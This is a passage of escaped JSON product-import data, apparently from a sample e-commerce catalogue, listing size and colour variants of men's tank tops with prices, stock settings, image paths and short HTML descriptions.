Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-endurance-tank-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt04-blue_alt1.jpg,\\/m\\/t\\/mt04-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt04-blue_alt1.jpg,\\/m\\/t\\/mt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"628\":{\"sku\":\"MT04-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Helios Endurance Tank-XL-Blue\",\"description\":\"<p>When training pushes your limits, you need gear that works harder than you. Our mesh Helio Training Tank is crafted from super-soft, ultra-lightweight fabric that stretches in all directions to follow your every move, on mat, court or street.<\\/p>\\n<p>&bull; Blue heather tank with gray pocket.<br \\/>&bull; Contrast sides and back inserts.<br \\/>&bull; Self-fabric binding at neck and armholes. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-endurance-tank-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt04-blue_alt1.jpg,\\/m\\/t\\/mt04-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt04-blue_alt1.jpg,\\/m\\/t\\/mt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"629\":{\"sku\":\"MT04\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Helios Endurance Tank\",\"description\":\"<p>When training pushes your limits, you need gear that works harder than you. Our mesh Helio Training Tank is crafted from super-soft, ultra-lightweight fabric that stretches in all directions to follow your every move, on mat, court or street.<\\/p>\\n<p>&bull; Blue heather tank with gray pocket.<br \\/>&bull; Contrast sides and back inserts.<br \\/>&bull; Self-fabric binding at neck and armholes. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Cocona&reg; performance fabric|Organic Cotton|Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=Yes,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MT04-XS-Blue,size=XS,color=Blue|sku=MT04-S-Blue,size=S,color=Blue|sku=MT04-M-Blue,size=M,color=Blue|sku=MT04-L-Blue,size=L,color=Blue|sku=MT04-XL-Blue,size=XL,color=Blue\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt04-blue_alt1.jpg,\\/m\\/t\\/mt04-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt04-blue_alt1.jpg,\\/m\\/t\\/mt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Cocona&reg; performance fabric|Organic Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"Yes\",\"new\":\"Yes\",\"sale\":\"No\"},\"630\":{\"sku\":\"MT05-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Rocco Gym Tank-XS-Blue\",\"description\":\"<p>Weights? Heavy Bag? Bikram? However you get sweaty, you\'ll be prepared with the moisture-wicking all-purpose Rocco Gym Tank. The free-moving cut gives you maximum range of motion, with flatlock seams to eliminate chafing.<\\/p>\\n<p>&bull; Light blue heather gray tank.<br \\/>&bull; Quick-drying, moisture-wicking.<br \\/>&bull; 4-way stretch construction.<br \\/>&bull; Flatlock seams prevent chafing.<br \\/>&bull; Mesh at back for breathability.<br \\/>&bull; 100% Polyester.<br \\/>&bull; UPF 50 protection.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rocco-gym-tank-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"631\":{\"sku\":\"MT05-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Rocco Gym Tank-S-Blue\",\"description\":\"<p>Weights? Heavy Bag? Bikram? However you get sweaty, you\'ll be prepared with the moisture-wicking all-purpose Rocco Gym Tank. The free-moving cut gives you maximum range of motion, with flatlock seams to eliminate chafing.<\\/p>\\n<p>&bull; Light blue heather gray tank.<br \\/>&bull; Quick-drying, moisture-wicking.<br \\/>&bull; 4-way stretch construction.<br \\/>&bull; Flatlock seams prevent chafing.<br \\/>&bull; Mesh at back for breathability.<br \\/>&bull; 100% Polyester.<br \\/>&bull; UPF 50 protection.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rocco-gym-tank-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"632\":{\"sku\":\"MT05-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Rocco Gym Tank-M-Blue\",\"description\":\"<p>Weights? Heavy Bag? Bikram? However you get sweaty, you\'ll be prepared with the moisture-wicking all-purpose Rocco Gym Tank. The free-moving cut gives you maximum range of motion, with flatlock seams to eliminate chafing.<\\/p>\\n<p>&bull; Light blue heather gray tank.<br \\/>&bull; Quick-drying, moisture-wicking.<br \\/>&bull; 4-way stretch construction.<br \\/>&bull; Flatlock seams prevent chafing.<br \\/>&bull; Mesh at back for breathability.<br \\/>&bull; 100% Polyester.<br \\/>&bull; UPF 50 protection.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rocco-gym-tank-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"633\":{\"sku\":\"MT05-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Rocco Gym Tank-L-Blue\",\"description\":\"<p>Weights? Heavy Bag? Bikram? However you get sweaty, you\'ll be prepared with the moisture-wicking all-purpose Rocco Gym Tank. The free-moving cut gives you maximum range of motion, with flatlock seams to eliminate chafing.<\\/p>\\n<p>&bull; Light blue heather gray tank.<br \\/>&bull; Quick-drying, moisture-wicking.<br \\/>&bull; 4-way stretch construction.<br \\/>&bull; Flatlock seams prevent chafing.<br \\/>&bull; Mesh at back for breathability.<br \\/>&bull; 100% Polyester.<br \\/>&bull; UPF 50 protection.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rocco-gym-tank-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"634\":{\"sku\":\"MT05-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Rocco Gym Tank-XL-Blue\",\"description\":\"<p>Weights? Heavy Bag? Bikram? However you get sweaty, you\'ll be prepared with the moisture-wicking all-purpose Rocco Gym Tank. The free-moving cut gives you maximum range of motion, with flatlock seams to eliminate chafing.<\\/p>\\n<p>&bull; Light blue heather gray tank.<br \\/>&bull; Quick-drying, moisture-wicking.<br \\/>&bull; 4-way stretch construction.<br \\/>&bull; Flatlock seams prevent chafing.<br \\/>&bull; Mesh at back for breathability.<br \\/>&bull; 100% Polyester.<br \\/>&bull; UPF 50 protection.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rocco-gym-tank-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"635\":{\"sku\":\"MT05\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Rocco Gym Tank\",\"description\":\"<p>Weights? Heavy Bag? Bikram? However you get sweaty, you\'ll be prepared with the moisture-wicking all-purpose Rocco Gym Tank. The free-moving cut gives you maximum range of motion, with flatlock seams to eliminate chafing.<\\/p>\\n<p>&bull; Light blue heather gray tank.<br \\/>&bull; Quick-drying, moisture-wicking.<br \\/>&bull; 4-way stretch construction.<br \\/>&bull; Flatlock seams prevent chafing.<br \\/>&bull; Mesh at back for breathability.<br \\/>&bull; 100% Polyester.<br \\/>&bull; UPF 50 protection.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Cocona&reg; performance fabric|Organic 